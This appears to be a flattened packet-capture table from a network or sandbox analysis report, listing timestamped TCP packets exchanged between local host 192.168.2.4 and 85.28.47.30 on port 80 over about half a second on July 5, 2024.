                                                                Jul 5, 2024 04:23:18.674953938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.674962997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.674972057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.674982071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.674993038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.674998999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.675015926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748545885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748567104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748575926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748634100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748644114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748650074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748656988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748668909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748676062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748681068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748696089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748717070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748718977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748755932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748779058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748790026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748799086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748819113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748841047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748842955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748857021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748867989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748877048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748888016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748898029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748920918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.748951912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.748964071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749001026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749022961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749033928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749043941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749053001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749066114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749075890 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749202967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749248028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749264002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749277115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749308109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749330044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749341011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749382019 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749392033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749403954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749413013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749432087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749439955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749444008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749452114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749463081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749474049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749480963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749495029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749516964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749521971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749533892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749563932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749622107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749633074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749648094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749658108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749666929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749677896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749681950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749692917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749702930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749702930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749711990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749716043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749726057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749738932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749752045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749809027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749819994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749830008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749841928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749851942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749861002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749865055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749872923 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749876976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749887943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749890089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749913931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749932051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.749944925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749955893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749963999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.749986887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750008106 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750015974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750025988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750036001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750052929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750076056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750137091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750148058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750161886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750171900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750183105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750184059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750194073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750205040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750207901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750221968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750240088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750242949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750252962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750262022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750273943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750288010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.750289917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750314951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.750324965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.834132910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.838911057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018681049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018722057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018733025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018789053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018800020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018809080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018819094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018842936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018857002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018867016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.018914938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.018922091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018932104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018946886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.018964052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.018980026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019023895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019033909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019038916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019043922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019053936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019064903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019082069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019082069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019113064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019124985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019171000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019181967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019190073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019201994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019215107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019237995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019244909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019249916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019262075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019284964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019294977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019418001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019428968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019439936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019454002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019464016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019465923 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019474983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019486904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019490004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019527912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019531012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019542933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019551992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019562960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019573927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019577980 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019586086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019589901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019598007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019608021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019614935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019618988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019639969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019648075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019659042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019665956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019668102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019690037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019699097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019766092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019776106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019785881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019797087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019800901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019809008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019819021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019825935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019829035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019841909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019850969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019854069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019861937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.019872904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.019892931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.020056963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020066977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020076036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020087004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020097017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020097971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.020107031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020117998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020126104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.020129919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020140886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020152092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.020158052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.020175934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.020190954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.099332094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099350929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099359989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099396944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.099427938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.099638939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099649906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099659920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099669933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099685907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.099699020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099709034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099716902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.099720001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099733114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099745035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.099766970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.099853992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099872112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099883080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.099920034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100014925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100025892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100035906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100044966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100066900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100085020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100090981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100102901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100141048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100147963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100158930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100197077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100209951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100219965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100224972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100259066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100339890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100349903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100368023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100378990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100389957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100402117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100419044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100496054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100506067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100516081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100527048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100544930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100547075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100558043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100559950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100584984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100598097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100655079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100663900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100671053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100706100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100728989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100739956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100749016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100759983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100769997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100774050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100784063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100810051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100841045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100852013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100860119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100891113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100927114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100939035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100948095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100959063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100970984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.100971937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.100994110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.101005077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110033035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110049963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110059977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110071898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110102892 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110112906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110124111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110125065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110135078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110157013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110168934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110222101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110233068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110243082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110253096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110264063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110271931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110294104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110306025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110308886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110321045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110332012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110342979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110354900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110380888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110421896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110438108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110447884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110459089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110471010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110483885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110492945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110518932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110521078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110534906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110543966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110553026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110563993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110569954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110583067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110606909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110763073 CEST804973285.28.47.30192.168.2.4
